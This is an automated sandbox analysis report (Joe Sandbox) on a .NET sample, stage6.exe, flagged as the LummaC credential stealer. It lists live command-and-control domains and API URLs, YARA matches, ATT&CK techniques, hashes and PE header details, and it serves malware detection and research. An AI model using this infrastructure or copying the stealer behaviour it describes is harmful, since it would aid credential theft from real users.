                        Source: stage6.exe, 00000000.00000002.1154647742.00000000043B8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: crosshuaht.lat
                        Source: stage6.exe, 00000000.00000002.1154647742.00000000043B8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: sustainskelet.lat
                        Source: stage6.exe, 00000000.00000002.1154647742.00000000043B8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: aspecteirs.lat
                        Source: stage6.exe, 00000000.00000002.1154647742.00000000043B8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: energyaffai.lat
                        Source: stage6.exe, 00000000.00000002.1154647742.00000000043B8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: necklacebudi.lat
                        Source: stage6.exe, 00000000.00000002.1154647742.00000000043B8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: discokeyus.lat
                        Source: stage6.exe, 00000000.00000002.1154647742.00000000043B8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: grannyejh.lat
                        Source: stage6.exe, 00000000.00000002.1154647742.00000000043B8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: surmisehotte.click
                        Source: C:\Users\user\Desktop\stage6.exeProcess created: C:\Users\user\Desktop\stage6.exe "C:\Users\user\Desktop\stage6.exe"Jump to behavior
                        Source: C:\Users\user\Desktop\stage6.exeQueries volume information: C:\Users\user\Desktop\stage6.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\stage6.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\stage6.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\stage6.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                        Stealing of Sensitive Information

                        barindex
                        Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
                        Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
                        Source: Yara matchFile source: stage6.exe, type: SAMPLE
                        Source: Yara matchFile source: 0.0.stage6.exe.e80000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 00000000.00000000.1135848711.0000000000E82000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                        Source: Yara matchFile source: stage6.exe, type: SAMPLE
                        Source: Yara matchFile source: 0.0.stage6.exe.e80000.0.unpack, type: UNPACKEDPE

                        Remote Access Functionality

                        barindex
                        Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
                        Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
                        Source: Yara matchFile source: stage6.exe, type: SAMPLE
                        Source: Yara matchFile source: 0.0.stage6.exe.e80000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 00000000.00000000.1135848711.0000000000E82000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                        Source: Yara matchFile source: stage6.exe, type: SAMPLE
                        Source: Yara matchFile source: 0.0.stage6.exe.e80000.0.unpack, type: UNPACKEDPE
                        ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                        Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
                        Scheduled Task/Job
                        1
                        Scheduled Task/Job
                        11
                        Process Injection
                        2
                        Virtualization/Sandbox Evasion
                        OS Credential Dumping11
                        Security Software Discovery
                        Remote Services11
                        Archive Collected Data
                        11
                        Encrypted Channel
                        Exfiltration Over Other Network MediumAbuse Accessibility Features
                        CredentialsDomainsDefault Accounts1
                        PowerShell
                        1
                        DLL Side-Loading
                        1
                        Scheduled Task/Job
                        1
                        Disable or Modify Tools
                        LSASS Memory2
                        Virtualization/Sandbox Evasion
                        Remote Desktop Protocol2
                        Clipboard Data
                        1
                        Ingress Tool Transfer
                        Exfiltration Over BluetoothNetwork Denial of Service
                        Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
                        DLL Side-Loading
                        11
                        Process Injection
                        Security Account Manager1
                        Process Discovery
                        SMB/Windows Admin SharesData from Network Shared Drive3
                        Non-Application Layer Protocol
                        Automated ExfiltrationData Encrypted for Impact
                        Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook111
                        Deobfuscate/Decode Files or Information
                        NTDS12
                        System Information Discovery
                        Distributed Component Object ModelInput Capture114
                        Application Layer Protocol
                        Traffic DuplicationData Destruction
                        Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script4
                        Obfuscated Files or Information
                        LSA SecretsInternet Connection DiscoverySSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                        Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts22
                        Software Packing
                        Cached Domain CredentialsWi-Fi DiscoveryVNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                        DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
                        DLL Side-Loading
                        DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                        Hide Legend

                        Legend:

                        • Process
                        • Signature
                        • Created File
                        • DNS/IP Info
                        • Is Dropped
                        • Is Windows Process
                        • Number of created Registry Values
                        • Number of created Files
                        • Visual Basic
                        • Delphi
                        • Java
                        • .Net C# or VB.NET
                        • C, C++ or other language
                        • Is malicious
                        • Internet
                        behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1675329 Sample: stage6.exe Startdate: 27/04/2025 Architecture: WINDOWS Score: 100 13 sustainskelet.lat 2->13 15 surmisehotte.click 2->15 17 8 other IPs or domains 2->17 23 Suricata IDS alerts for network traffic 2->23 25 Found malware configuration 2->25 27 Antivirus detection for URL or domain 2->27 29 12 other signatures 2->29 7 stage6.exe 2 2->7         started        signatures3 process4 signatures5 31 Tries to detect sandboxes and other dynamic analysis tools (process name or module or function) 7->31 33 LummaC encrypted strings found 7->33 10 stage6.exe 7->10         started        process6 dnsIp7 19 surmisehotte.click 104.21.32.1, 443, 49713 CLOUDFLARENETUS United States 10->19 21 steamcommunity.com 23.52.218.12, 443, 49722 TelecentroSAAR United States 10->21

                        This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                        windows-stand
                        SourceDetectionScannerLabelLink
                        stage6.exe59%VirustotalBrowse
                        stage6.exe64%ReversingLabsWin32.Trojan.Leonem
                        stage6.exe100%AviraHEUR/AGEN.1323360
                        SAMPLE100%Joe Sandbox ML
                        No Antivirus matches
                        No Antivirus matches
                        No Antivirus matches
                        SourceDetectionScannerLabelLink
                        crosshuaht.lat100%Avira URL Cloudmalware
                        https://rapeflowwj.lat/100%Avira URL Cloudmalware
                        energyaffai.lat100%Avira URL Cloudmalware
                        sustainskelet.lat100%Avira URL Cloudmalware
                        necklacebudi.lat100%Avira URL Cloudmalware
                        rapeflowwj.lat100%Avira URL Cloudmalware
                        https://necklacebudi.lat/api100%Avira URL Cloudmalware
                        https://surmisehotte.click/api0%Avira URL Cloudsafe
                        surmisehotte.click0%Avira URL Cloudsafe
                        aspecteirs.lat100%Avira URL Cloudmalware
                        grannyejh.lat100%Avira URL Cloudmalware
                        discokeyus.lat100%Avira URL Cloudmalware

                        Download Network PCAP: filteredfull

                        NameIPActiveMaliciousAntivirus DetectionReputation
                        surmisehotte.click
                        104.21.32.1
                        truetrue
                          unknown
                          steamcommunity.com
                          23.52.218.12
                          truefalse
                            high
                            sustainskelet.lat
                            unknown
                            unknowntrue
                              unknown
                              crosshuaht.lat
                              unknown
                              unknowntrue
                                unknown
                                rapeflowwj.lat
                                unknown
                                unknowntrue
                                  unknown
                                  grannyejh.lat
                                  unknown
                                  unknowntrue
                                    unknown
                                    aspecteirs.lat
                                    unknown
                                    unknowntrue
                                      unknown
                                      discokeyus.lat
                                      unknown
                                      unknowntrue
                                        unknown
                                        energyaffai.lat
                                        unknown
                                        unknowntrue
                                          unknown
                                          necklacebudi.lat
                                          unknown
                                          unknowntrue
                                            unknown
                                            NameMaliciousAntivirus DetectionReputation
                                            https://steamcommunity.com/profiles/76561199724331900false
                                              high
                                              necklacebudi.lattrue
                                              • Avira URL Cloud: malware
                                              unknown
                                              aspecteirs.lattrue
                                              • Avira URL Cloud: malware
                                              unknown
                                              energyaffai.lattrue
                                              • Avira URL Cloud: malware
                                              unknown
                                              https://surmisehotte.click/apitrue
                                              • Avira URL Cloud: safe
                                              unknown
                                              surmisehotte.clicktrue
                                              • Avira URL Cloud: safe
                                              unknown
                                              sustainskelet.lattrue
                                              • Avira URL Cloud: malware
                                              unknown
                                              crosshuaht.lattrue
                                              • Avira URL Cloud: malware
                                              unknown
                                              rapeflowwj.lattrue
                                              • Avira URL Cloud: malware
                                              unknown
                                              grannyejh.lattrue
                                              • Avira URL Cloud: malware
                                              unknown
                                              discokeyus.lattrue
                                              • Avira URL Cloud: malware
                                              unknown
                                              NameSourceMaliciousAntivirus DetectionReputation
                                              https://stackoverflow.com/q/14436606/23354stage6.exe, 00000000.00000002.1157668581.0000000005CB0000.00000004.08000000.00040000.00000000.sdmp, stage6.exe, 00000000.00000002.1145306123.00000000033B1000.00000004.00000800.00020000.00000000.sdmp, stage6.exe, 00000000.00000002.1154647742.0000000004487000.00000004.00000800.00020000.00000000.sdmpfalse
                                                high
                                                https://github.com/mgravell/protobuf-netJstage6.exe, 00000000.00000002.1157668581.0000000005CB0000.00000004.08000000.00040000.00000000.sdmp, stage6.exe, 00000000.00000002.1154647742.0000000004487000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  high
                                                  https://community.cloudflare.steamstatic.com/public/javascript/applications/community/main.js?v=iOnzstage6.exe, 00000001.00000002.1379039032.0000000000C8C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    high
                                                    https://rapeflowwj.lat/stage6.exe, 00000001.00000002.1379141192.0000000000CD7000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    • Avira URL Cloud: malware
                                                    unknown
                                                    https://github.com/mgravell/protobuf-netstage6.exe, 00000000.00000002.1157668581.0000000005CB0000.00000004.08000000.00040000.00000000.sdmp, stage6.exe, 00000000.00000002.1154647742.0000000004487000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      high
                                                      https://community.cloudflare.steamstatic.com/public/css/applications/community/main.css?v=djUBMuXjwAstage6.exe, 00000001.00000002.1379039032.0000000000C8C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        high
                                                        https://community.cloudflare.steamstatic.com/public/javascript/applications/community/manifest.js?v=stage6.exe, 00000001.00000002.1379039032.0000000000C8C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          high
                                                          https://necklacebudi.lat/apistage6.exe, 00000001.00000002.1379141192.0000000000CD7000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          • Avira URL Cloud: malware
                                                          unknown
                                                          https://github.com/mgravell/protobuf-netistage6.exe, 00000000.00000002.1157668581.0000000005CB0000.00000004.08000000.00040000.00000000.sdmp, stage6.exe, 00000000.00000002.1154647742.0000000004487000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            high
                                                            https://avatars.cloudflare.steamstatic.com/fef49e7fa7e1997310d705b2a6158ff8dc1cdfeb_full.jpgstage6.exe, 00000001.00000002.1379039032.0000000000C8C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              high
                                                              https://stackoverflow.com/q/11564914/23354;stage6.exe, 00000000.00000002.1157668581.0000000005CB0000.00000004.08000000.00040000.00000000.sdmp, stage6.exe, 00000000.00000002.1154647742.0000000004487000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                high
                                                                https://stackoverflow.com/q/2152978/23354stage6.exe, 00000000.00000002.1157668581.0000000005CB0000.00000004.08000000.00040000.00000000.sdmp, stage6.exe, 00000000.00000002.1154647742.0000000004487000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  high
                                                                  https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20Feedbackstage6.exe, 00000001.00000002.1379141192.0000000000C9D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                    high
                                                                    https://community.cloudflare.steamstatic.com/public/javascript/applications/community/libraries~b28bstage6.exe, 00000001.00000002.1379039032.0000000000C8C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                      high
                                                                      https://steamcommunity.com/stage6.exe, 00000001.00000002.1379141192.0000000000C9D000.00000004.00000020.00020000.00000000.sdmp, stage6.exe, 00000001.00000002.1379141192.0000000000CA3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                        high
                                                                        http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namestage6.exe, 00000000.00000002.1145306123.00000000033B1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          high
                                                                          • No. of IPs < 25%
                                                                          • 25% < No. of IPs < 50%
                                                                          • 50% < No. of IPs < 75%
                                                                          • 75% < No. of IPs
                                                                          IPDomainCountryFlagASNASN NameMalicious
                                                                          104.21.32.1
                                                                          surmisehotte.clickUnited States
                                                                          13335CLOUDFLARENETUStrue
                                                                          23.52.218.12
                                                                          steamcommunity.comUnited States
                                                                          27747TelecentroSAARfalse
                                                                          Joe Sandbox version:42.0.0 Malachite
                                                                          Analysis ID:1675329
                                                                          Start date and time:2025-04-27 05:32:15 +02:00
                                                                          Joe Sandbox product:CloudBasic
                                                                          Overall analysis duration:0h 5m 42s
                                                                          Hypervisor based Inspection enabled:false
                                                                          Report type:full
                                                                          Cookbook file name:default.jbs
                                                                          Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 134, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                          Number of analysed new started processes analysed:12
                                                                          Number of new started drivers analysed:0
                                                                          Number of existing processes analysed:0
                                                                          Number of existing drivers analysed:0
                                                                          Number of injected processes analysed:0
                                                                          Technologies:
                                                                          • HCA enabled
                                                                          • EGA enabled
                                                                          • AMSI enabled
                                                                          Analysis Mode:default
                                                                          Analysis stop reason:Timeout
                                                                          Sample name:stage6.exe
                                                                          Detection:MAL
                                                                          Classification:mal100.troj.evad.winEXE@3/0@10/2
                                                                          EGA Information:
                                                                          • Successful, ratio: 50%
                                                                          HCA Information:
                                                                          • Successful, ratio: 80%
                                                                          • Number of executed functions: 27
                                                                          • Number of non-executed functions: 67
                                                                          Cookbook Comments:
                                                                          • Found application associated with file extension: .exe
                                                                          • Exclude process from analysis (whitelisted): MpCmdRun.exe, sppsvc.exe, SIHClient.exe, SgrmBroker.exe, conhost.exe, svchost.exe
                                                                          • Excluded IPs from analysis (whitelisted): 184.29.183.29, 20.109.210.53
                                                                          • Excluded domains from analysis (whitelisted): a-ring-fallback.msedge.net, fs.microsoft.com, slscr.update.microsoft.com, fe3cr.delivery.mp.microsoft.com
                                                                          • Execution Graph export aborted for target stage6.exe, PID 6272 because it is empty
                                                                          • Not all processes where analyzed, report is missing behavior information
                                                                          • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                                          • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                          • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                          • Report size getting too big, too many NtQueryValueKey calls found.
                                                                          TimeTypeDescription
                                                                          23:33:31API Interceptor9x Sleep call for process: stage6.exe modified
                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                          104.21.32.1QHT-CC250001-B(01).exeGet hashmaliciousFormBookBrowse
                                                                          • www.6644win.mom/hs6j/
                                                                          setup_2gAmkpiuyl.exeGet hashmaliciousUnknownBrowse
                                                                          • start7345724.ru/new/net_api
                                                                          ungziped_file.exeGet hashmaliciousFormBookBrowse
                                                                          • www.uqcdnvgr.biz/vhql/
                                                                          JMM259057# POD_ INVOICE.exeGet hashmaliciousFormBookBrowse
                                                                          • www.6644win.mom/hs6j/
                                                                          BJfenN3Tx4VVygj.exeGet hashmaliciousFormBookBrowse
                                                                          • www.896bt55fz.xyz/5fom/
                                                                          Purchase Order.exeGet hashmaliciousFormBookBrowse
                                                                          • www.uqcdnvgr.biz/mfiy/
                                                                          YZTIBVYC.msiGet hashmaliciousUnknownBrowse
                                                                          • cdn-upload-files.buzz/c
                                                                          SecuriteInfo.com.Win32.MalwareX-gen.31929.22299.exeGet hashmaliciousFormBookBrowse
                                                                          • www.roastroots.lol/8cwp/
                                                                          Quotation List.exeGet hashmaliciousFormBookBrowse
                                                                          • www.6644win.mom/hs6j/
                                                                          11042025-Payment-swift.exeGet hashmaliciousFormBookBrowse
                                                                          • www.meshki-co-uk.shop/b8n0/
                                                                          23.52.218.12random.exeGet hashmaliciousAmadey, LummaC Stealer, RHADAMANTHYSBrowse
                                                                            random.exeGet hashmaliciousLummaC StealerBrowse
                                                                              random.exeGet hashmaliciousLummaC StealerBrowse
                                                                                random.exeGet hashmaliciousLummaC StealerBrowse
                                                                                  HL1YRkM.exeGet hashmaliciousLummaC StealerBrowse
                                                                                    random.exeGet hashmaliciousAmadey, CryptOne, LummaC StealerBrowse
                                                                                      random.exeGet hashmaliciousLummaC StealerBrowse
                                                                                        random.exeGet hashmaliciousAmadey, LummaC Stealer, RHADAMANTHYSBrowse
                                                                                          05vwwzcgPF.exeGet hashmaliciousLummaC StealerBrowse
                                                                                            Ethelium.exeGet hashmaliciousUnknownBrowse
                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                              steamcommunity.comrandom.exeGet hashmaliciousAmadey, Credential Flusher, Healer AV Disabler, LummaC StealerBrowse
                                                                                              • 23.52.218.12
                                                                                              random.exeGet hashmaliciousAmadey, Credential Flusher, Healer AV Disabler, LummaC StealerBrowse
                                                                                              • 23.52.218.12
                                                                                              random.exeGet hashmaliciousAmadey, Credential Flusher, Healer AV Disabler, LummaC StealerBrowse
                                                                                              • 23.52.218.12
                                                                                              random.exeGet hashmaliciousAmadey, LummaC Stealer, RHADAMANTHYSBrowse
                                                                                              • 23.52.218.12
                                                                                              random.exeGet hashmaliciousLummaC StealerBrowse
                                                                                              • 23.52.218.12
                                                                                              random.exeGet hashmaliciousLummaC StealerBrowse
                                                                                              • 23.52.218.12
                                                                                              random.exeGet hashmaliciousLummaC StealerBrowse
                                                                                              • 23.52.218.12
                                                                                              HL1YRkM.exeGet hashmaliciousLummaC StealerBrowse
                                                                                              • 23.52.218.12
                                                                                              random.exeGet hashmaliciousAmadey, CryptOne, LummaC StealerBrowse
                                                                                              • 23.52.218.12
                                                                                              random.exeGet hashmaliciousLummaC StealerBrowse
                                                                                              • 23.52.218.12
                                                                                              surmisehotte.clicksingl6.mp4.htaGet hashmaliciousLummaCBrowse
                                                                                              • 104.21.64.1
                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                              TelecentroSAARhttps://voiceoversecure.divineblizzsystems.com&d=DwMGaQGet hashmaliciousUnknownBrowse
                                                                                              • 23.52.210.234
                                                                                              random.exeGet hashmaliciousAmadey, LummaC Stealer, RHADAMANTHYSBrowse
                                                                                              • 23.52.218.12
                                                                                              random.exeGet hashmaliciousLummaC StealerBrowse
                                                                                              • 23.52.218.12
                                                                                              random.exeGet hashmaliciousLummaC StealerBrowse
                                                                                              • 23.52.218.12
                                                                                              random.exeGet hashmaliciousLummaC StealerBrowse
                                                                                              • 23.52.218.12
                                                                                              HL1YRkM.exeGet hashmaliciousLummaC StealerBrowse
                                                                                              • 23.52.218.12
                                                                                              random.exeGet hashmaliciousAmadey, CryptOne, LummaC StealerBrowse
                                                                                              • 23.52.218.12
                                                                                              random.exeGet hashmaliciousLummaC StealerBrowse
                                                                                              • 23.52.218.12
                                                                                              random.exeGet hashmaliciousAmadey, LummaC Stealer, RHADAMANTHYSBrowse
                                                                                              • 23.52.218.12
                                                                                              05vwwzcgPF.exeGet hashmaliciousLummaC StealerBrowse
                                                                                              • 23.52.218.12
                                                                                              CLOUDFLARENETUSOblivora Setup.msiGet hashmaliciousUnknownBrowse
                                                                                              • 172.64.41.3
                                                                                              svchost.exeGet hashmaliciousAsyncRAT, XWormBrowse
                                                                                              • 104.22.69.199
                                                                                              InstallerV1.exeGet hashmaliciousLummaC StealerBrowse
                                                                                              • 172.67.205.184
                                                                                              250426-1adwksztb1.bin.exeGet hashmaliciousPython Stealer, Blank Grabber, Exela Stealer, Umbral StealerBrowse
                                                                                              • 162.159.138.232
                                                                                              https://newsletter-editor.poweredbyintegra.dk/?NewsLetterTracker=true&bio=holstebrony&newsletter_ID=1&Text=Eget%20billede%20(ingen%20mellemrum)&Code=106&utcmabite=f9d0de3f-59af-46e8-b932-e8ab5db62f67&biocode=holstebrony&RedirectUrl=artisanglobaltour.com/fcrfr6/505388/bXRvcnJlc0B3YXRlcndvcmtzLmNvbQ==Get hashmaliciousHTMLPhisher, Invisible JS, Tycoon2FABrowse
                                                                                              • 104.21.33.142
                                                                                              Invio Ordine accompagnatorio n. 20250425-70611 del 04252025 - C.E.F. Srl.exeGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                                                              • 104.26.13.205
                                                                                              SecuriteInfo.com.FileRepMalware.29861.29138.msiGet hashmaliciousUnknownBrowse
                                                                                              • 172.64.41.3
                                                                                              RicevutaBonificoSepa1745392212214#U00b7PDF.scr.exeGet hashmaliciousMSIL Logger, MassLogger RATBrowse
                                                                                              • 104.21.64.1
                                                                                              SecuriteInfo.com.Win64.Evo-gen.16193.28986.exeGet hashmaliciousLummaC StealerBrowse
                                                                                              • 104.21.30.239
                                                                                              DOCUMENTO_FA-45-04-2025.vbsGet hashmaliciousUnknownBrowse
                                                                                              • 1.1.1.1
                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                              a0e9f5d64349fb13191bc781f81f42e1InstallerV1.exeGet hashmaliciousLummaC StealerBrowse
                                                                                              • 104.21.32.1
                                                                                              • 23.52.218.12
                                                                                              SecuriteInfo.com.FileRepMalware.29861.29138.msiGet hashmaliciousUnknownBrowse
                                                                                              • 104.21.32.1
                                                                                              • 23.52.218.12
                                                                                              SecuriteInfo.com.Win64.Evo-gen.16193.28986.exeGet hashmaliciousLummaC StealerBrowse
                                                                                              • 104.21.32.1
                                                                                              • 23.52.218.12
                                                                                              _$kyLoad3rr.exeGet hashmaliciousLummaC StealerBrowse
                                                                                              • 104.21.32.1
                                                                                              • 23.52.218.12
                                                                                              start.exeGet hashmaliciousLummaC StealerBrowse
                                                                                              • 104.21.32.1
                                                                                              • 23.52.218.12
                                                                                              SentraX.exeGet hashmaliciousLummaC StealerBrowse
                                                                                              • 104.21.32.1
                                                                                              • 23.52.218.12
                                                                                              LCrypt0rX.vbsGet hashmaliciousLCRYXBrowse
                                                                                              • 104.21.32.1
                                                                                              • 23.52.218.12
                                                                                              Payment Asvice in Doc.VBE.vbeGet hashmaliciousMSIL Logger, MassLogger RATBrowse
                                                                                              • 104.21.32.1
                                                                                              • 23.52.218.12
                                                                                              Luma_Crypt_Packlab.exeGet hashmaliciousLummaC StealerBrowse
                                                                                              • 104.21.32.1
                                                                                              • 23.52.218.12
                                                                                              script.exeGet hashmaliciousLummaC StealerBrowse
                                                                                              • 104.21.32.1
                                                                                              • 23.52.218.12
                                                                                              No context
                                                                                              No created / dropped files found
                                                                                              File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                              Entropy (8bit):7.4951662203772385
                                                                                              TrID:
                                                                                              • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                                                                              • Win32 Executable (generic) a (10002005/4) 49.78%
                                                                                              • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                                                              • Generic Win/DOS Executable (2004/3) 0.01%
                                                                                              • DOS Executable Generic (2002/1) 0.01%
                                                                                              File name:stage6.exe
                                                                                              File size:1'657'856 bytes
                                                                                              MD5:03be1ee0944764446cd61be6ae8cc497
                                                                                              SHA1:a8007574c5a81af39d193b19a29cc2fde8305f26
                                                                                              SHA256:ca00dbff57cdc83f39a213ea96726063f18aa14f9a0ae2f52c2c6d54f23dcd00
                                                                                              SHA512:5485608698ec5db99f298ef9d080ddaab94051c7d3411171e3f3ea996758d1843ff973f7dd2fcdba1532d43a51e51c5da70b25818ee9f6a0543e0cfdcb6026e4
                                                                                              SSDEEP:24576:DHlYQzwg8Myznor627VGOTZ7ND3EvxSvqdbeyIAkmsHiEE1BNCmxZh+tEu8B:DG+6EVjZR3EpIqdyRms4Xh+th
                                                                                              TLSH:C775BF03B6A78AF0E69C1B33C4E7881403E4D98577EFE71EB469335526113AADE0259F
                                                                                              File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.../.fg.................B...........a... ........@.. ....................................`................................
                                                                                              Icon Hash:90cececece8e8eb0
                                                                                              Entrypoint:0x5961de
                                                                                              Entrypoint Section:.text
                                                                                              Digitally signed:false
                                                                                              Imagebase:0x400000
                                                                                              Subsystem:windows gui
                                                                                              Image File Characteristics:EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                                                                                              DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                              Time Stamp:0x6766D52F [Sat Dec 21 14:48:15 2024 UTC]
                                                                                              TLS Callbacks:
                                                                                              CLR (.Net) Version:
                                                                                              OS Version Major:4
                                                                                              OS Version Minor:0
                                                                                              File Version Major:4
                                                                                              File Version Minor:0
                                                                                              Subsystem Version Major:4
                                                                                              Subsystem Version Minor:0
                                                                                              Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
                                                                                              Instruction
                                                                                              jmp dword ptr [00402000h]
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              NameVirtual AddressVirtual Size Is in Section
                                                                                              IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                              IMAGE_DIRECTORY_ENTRY_IMPORT0x1961900x4b.text
                                                                                              IMAGE_DIRECTORY_ENTRY_RESOURCE0x1980000x568.rsrc
